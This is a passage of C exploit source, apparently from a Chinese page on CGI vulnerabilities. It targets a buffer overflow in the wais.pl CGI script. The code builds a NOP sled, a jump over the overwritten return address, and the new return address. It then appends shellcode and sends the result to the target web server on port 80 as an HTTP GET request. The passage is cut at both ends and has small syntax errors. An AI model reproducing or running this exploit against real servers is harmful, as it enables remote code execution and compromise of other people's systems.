|
CGI漏洞(27) There are a few arbitrary bytes between them, therefore we
jump over them with 0xeb 0x08 and land somewhere in the given NOPS
*/ memset(smash, 0x90, 7+align);
/* Few nops on the stack - waisq ruins some bytes */
smash[7+align] = 0xeb; /* Jump over the EIP that we overflow */
smash[8+align] = 0x04; /* It‘s 4 bytes big */ /* Return address gets choked in here */ memcpy(smash+9+align, &retaddy, 4);
smash[13+align] = 0x00; /* strcat() needs the delimiter */ strcat(smash, hellcode); /* Copy the shellcode */ sprintf(output, "GET /cgi-bin/wais.pl?-s+%s+-t+%s HTTP/1.0\n\n",
source, smash); /* Stuff it all on the heap */ free(smash);
return(output); /* And return the pointer there */
} /*
Connects to a webserver
"ip" is expected to be in network byte order
*/ int wwwconnect(unsigned long ip)
{
struct sockaddr_in sa; /* Sockaddr */
int sd; /* Socket Descriptor */ if((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket()";
exit(-1);
} memset(&sa, 0x00, sizeof(struct sockaddr_in));
sa.sin_port=htons(80);
sa.sin_addr.s_addr=ip; if(connect(sd, &sa, sizeof(struct sockaddr_in)) == -1) {
perror("connect()";
| 
